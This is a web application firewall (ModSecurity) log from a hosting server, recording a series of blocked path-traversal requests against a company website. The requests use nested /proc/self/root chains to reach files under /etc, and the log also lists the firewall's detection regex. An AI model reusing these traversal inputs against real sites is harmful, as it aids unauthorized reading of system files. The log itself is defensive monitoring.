[Thu Mar 19 05:11:06.995520 2026] [:error] [pid 15826:tid 140411540502272] [client 74.7.243.128:34750] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/issue.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuvmuoXxyEfFpUF8f_jhAAAAVg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 05:11:08.439236 2026] [:error] [pid 14269:tid 140411691570944] [client 74.7.243.128:42938] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/pm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuvnAbLMZ6AikZjR9Uv6AAAAAY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 05:11:09.794957 2026] [:error] [pid 30077:tid 140411599251200] [client 74.7.243.128:56154] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/rc.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuvnfu8EFLIOrSqIptxWwAAAlE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 05:11:11.099031 2026] [:error] [pid 27403:tid 140411590858496] [client 74.7.243.128:56156] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/cron.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuvnxkFeYa1D6dYQnDBVQAAAdI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 05:11:16.831525 2026] [:error] [pid 27403:tid 140411548894976] [client 74.7.243.128:56166] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/opt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuvpBkFeYa1D6dYQnDBawAAAdc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 05:11:18.203087 2026] [:error] [pid 26799:tid 140411574073088] [client 74.7.243.128:56170] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/rpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuvpta6ubjKNq_cu4YVkgAAA1Q"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 05:11:27.575080 2026] [:error] [pid 31803:tid 140411674785536] [client 74.7.243.128:35914] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/lldpd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuvr-yqAr6etmhZHNo2AwAAAEg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 05:11:37.839497 2026] [:error] [pid 14269:tid 140411616036608] [client 74.7.243.128:35928] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/gss"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuvuQbLMZ6AikZjR9UwAQAAAA8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 05:11:44.015145 2026] [:error] [pid 17887:tid 140411574073088] [client 74.7.243.128:43384] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/ntp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuvwAkwaGbbGflqUZCI8AAAANQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 05:12:04.990494 2026] [:error] [pid 17653:tid 140411590858496] [client 74.7.243.128:59442] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/group"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuv1Mdf6f5d65gmYZRGPwAAAtI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 05:12:06.657675 2026] [:error] [pid 15826:tid 140411540502272] [client 74.7.243.128:38036] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/selinux"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuv1uoXxyEfFpUF8f_jmQAAAVg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 05:12:08.536192 2026] [:error] [pid 14269:tid 140411708356352] [client 74.7.243.128:38038] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/issue.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuv2AbLMZ6AikZjR9UwBwAAAAQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 05:12:11.072734 2026] [:error] [pid 27293:tid 140411557287680] [client 74.7.243.128:54682] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/lwcorp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuv2_-YZRR_7pZ7nDJgAwAAA9Y"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 05:12:12.479080 2026] [:error] [pid 15826:tid 140411666392832] [client 74.7.243.128:54696] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/systemd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuv3OoXxyEfFpUF8f_jmgAAAUk"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 05:12:13.813826 2026] [:error] [pid 17887:tid 140411674785536] [client 74.7.243.128:54698] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/logrotate.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuv3QkwaGbbGflqUZCI-gAAAMg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 05:12:15.135050 2026] [:error] [pid 14269:tid 140411616036608] [client 74.7.243.128:54704] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/dovecot"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuv3wbLMZ6AikZjR9UwDgAAAA8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 05:12:16.455394 2026] [:error] [pid 27293:tid 140411632822016] [client 74.7.243.128:54706] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/python"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuv4P-YZRR_7pZ7nDJgBAAAA80"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 05:12:17.777181 2026] [:error] [pid 17887:tid 140411616036608] [client 74.7.243.128:54718] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/telegraf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuv4QkwaGbbGflqUZCJAwAAAM8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 05:12:20.928702 2026] [:error] [pid 19093:tid 140411725141760] [client 74.7.244.43:48584] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abuv5F_V7PWP6ixUYl6OewAAAoI"]
[Thu Mar 19 05:12:22.411161 2026] [:error] [pid 19093:tid 140411607643904] [client 74.7.243.128:54730] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/kernel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuv5l_V7PWP6ixUYl6OfwAAApA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 05:12:23.746025 2026] [:error] [pid 26799:tid 140411658000128] [client 74.7.243.128:41198] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/openldap"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuv59a6ubjKNq_cu4YV4wAAA0o"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 05:12:25.155120 2026] [:error] [pid 27293:tid 140411725141760] [client 74.7.243.128:41202] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/portreserve"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuv6f-YZRR_7pZ7nDJgCQAAA8I"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
